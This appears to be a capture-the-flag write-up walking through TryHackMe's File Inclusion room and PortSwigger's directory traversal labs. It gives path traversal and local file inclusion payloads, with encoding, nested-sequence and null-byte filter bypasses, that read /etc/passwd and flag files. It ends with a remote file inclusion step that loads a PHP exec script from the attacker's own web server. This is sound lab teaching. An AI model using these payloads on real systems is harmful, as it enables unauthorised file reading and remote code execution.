Web Fundamentals | File Inclusion
Hi there, I’m glad to see you here. In this article, we’ll examine together the “File Inclusion” room in TryHackMe and the “Directory Traversal” room in PortSwigger. In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
- Introduction
- Directory Traversal / PortSwigger
- Path Traversal / TryHackMe
- Local File Inclusion #1
- Local File Inclusion #2
- Remote File Inclusion
- Challenge
Introduction
File Inclusion vulnerabilities are commonly found and exploited in various programming languages for web applications, such as PHP that are poorly written and implemented. The main issue of these vulnerabilities is the input validation, in which the user inputs are not sanitized or validated, and the user controls them. When the input is not validated, the user can pass any input to the function, causing the vulnerability.
Directory Traversal / PortSwigger
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.
When we access the lab environment, we’re greeted by a shopping site.
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image.
👉🏻Send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
../../../etc/passwd❗️The sequence ../ is valid within a file path, and means to step up one level in the directory structure.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, traversal sequences blocked with absolute path bypass
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
/etc/passwd❗️You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, traversal sequences stripped non-recursively
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
....//....//....//etc/passwd❗️You might be able to use nested traversal sequences, such as ….// or ….\/, which will revert to simple traversal sequences when the inner sequence is stripped.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, traversal sequences stripped with superfluous URL-decode
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
Modify the filename parameter, giving it the value:
..%252f..%252f..%252fetc/passwd❗️In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters, resulting in %2e%2e%2f or %252e%252e%252f respectively.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, validation of start of path
If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences.
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
/var/www/images/../../../etc/passwd
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, validation of file extension with null byte bypass
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
../../../etc/passwd%00.png❗️Null byte is a bypass technique for sending data that would be filtered otherwise. It relies on injecting the null byte characters (%00, \x00) in the supplied data. Its role is to terminate a string.
https://www.thehacker.recipes/web/inputs/null-byte-injection
👉🏻Observe that the response contains the contents of the /etc/passwd file.
Path Traversal / TryHackMe
Also known as “Directory Traversal”, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application’s URL to locate and access files or directories stored outside the application’s root directory.
❗️Path traversal vulnerabilities occur when the user’s input is passed to a function such as file_get_contents in PHP.
https://www.php.net/manual/en/function.file-get-contents.php
Answer the questions below
❓Q1: What function causes path traversal vulnerabilities in PHP?
📣A1: file_get_contents
Local File Inclusion #1
Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.
❗️With PHP, using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications.
Answer the questions below
❓Q1: Give Lab #1 a try to read /etc/passwd. What would the request URI be?
📣A1: /lab1.php?file=/etc/passwd
Lab #1
👉🏻Include a file and examine the error message.
👉🏻Use Burp Suite to capture the request and then send the request to the Repeater.
👉🏻Modify the file parameter, giving it the value:
/etc/passwd
❗️In this case, it works because there isn’t a directory specified in the include function and no input validation.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
❓Q2: In Lab #2, what is the directory specified in the include function?
📣A2: includes
Lab #2
👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/passwd
👉🏻Observe that the response contains the contents of the /etc/passwd file.
Local File Inclusion #2
In this task, we go a little bit deeper into LFI. We’ll examine a couple of techniques to bypass the filter within the include function.
Answer the questions below
❓Q1: Give Lab #3 a try to read /etc/passwd. What is the request look like?
📣A1: /lab3.php?file=../../../../etc/passwd%00
Lab #3
👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/passwd%00❗️Using null bytes is an injection technique where URL-encoded representation such as %00 or 0x00 in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the null byte.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
❓Q2: Which function is causing the directory traversal in Lab #4?
📣A2: file_get_contents
Lab #4
👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/passwd/.❗️If we try this concept in the file system using “cd ..”, it will get you back one step; however, if you do “cd .”, it stays in the current directory. Similarly, if we try “/etc/passwd/..”, it results to be “/etc/” and that’s because we moved one to the root. Now if we try “/etc/passwd/.”, the result will be “/etc/passwd” since dot refers to the current directory.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
Lab #5
👉🏻Include a file and examine the error message.
❗️If we check the warning message in the include(includes/etc/passwd) section, we know that the web application replaces the ../ with the empty string. We can use the following technique to bypass this.
👉🏻Modify the file parameter, giving it the value:
....//....//....//....//etc/passwd
👉🏻Observe that the response contains the contents of the /etc/passwd file.
❓Q3: Try out Lab #6 and check what is the directory that has to be in the input field?
📣A3: THM-profile
❓Q4: Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
📣A4: 12.04
Lab #6
Finally, we’ll discuss the case where the developer forces the include to read from a defined directory! For example, if the web application asks to supply input that has to include a directory such as: “http://webapp.thm/index.php?lang=languages/EN.php” then, to exploit this, we need to include the directory in the payload like so:
?lang=languages/../../../../../etc/passwd👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
THM-profile/../../../../etc/os-release
👉🏻Observe that the response contains the contents of the /etc/os-release file.
Remote File Inclusion
Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected.
❗️One requirement for RFI is that the “allow_url_fopen” option needs to be on.
Note: You can examine the example about Remote File Inclusion at the end of the article.
Challenge
Great job! Now let’s apply the techniques we’ve learned to capture the flags!
Answer the questions below
❓Q1: Capture Flag1 at /etc/flag1
📣A1: *****************
👉🏻Change the request method to use the POST method instead of the GET method.
👉🏻And then forward the request.
👉🏻Examine the error message.
👉🏻Send the request to the Repeater.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/flag1
👉🏻Observe that the response contains the contents of the /etc/flag1 file.
❓Q2: Capture Flag2 at /etc/flag2
📣A2: ****************
👉🏻Forward the request.
👉🏻Examine the error message.
👉🏻Send the request to the Repeater.
👉🏻Modify the THM parameter, giving it the value:
../../../../etc/flag2%00
👉🏻Observe that the response contains the contents of the /etc/flag2 file.
❓Q3: Capture Flag3 at /etc/flag3
📣A3: ****************
👉🏻Include a file and examine the error message.
👉🏻Change the request method to use the POST method instead of the GET method.
👉🏻Send the request to the Repeater.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/flag3%00
👉🏻Observe that the response contains the contents of the /etc/flag3 file.
❓Q4: Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
📣A4: ***********************
About the RFI to RCE :
https://www.thehacker.recipes/web/inputs/file-inclusion/rfi-to-rce
👉🏻Create a PHP file that contains the following PHP code to display the hostname information.
<?php
print exec('hostname');
?>
👉🏻Start a web server.
python3 -m http.server
👉🏻Use the ifconfig command to find out the IP address you received as a result of your VPN tunnel connection.
👉🏻To include the PHP file we created:
http://10.10.25.60/playground.php?file=http://10.11.6.38:8000/hostname.php
Congratulations! We basically learned together how to exploit the “File Inclusion” vulnerability, which is one of the web application vulnerabilities. 👊🏻
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://portswigger.net/web-security/file-path-traversal
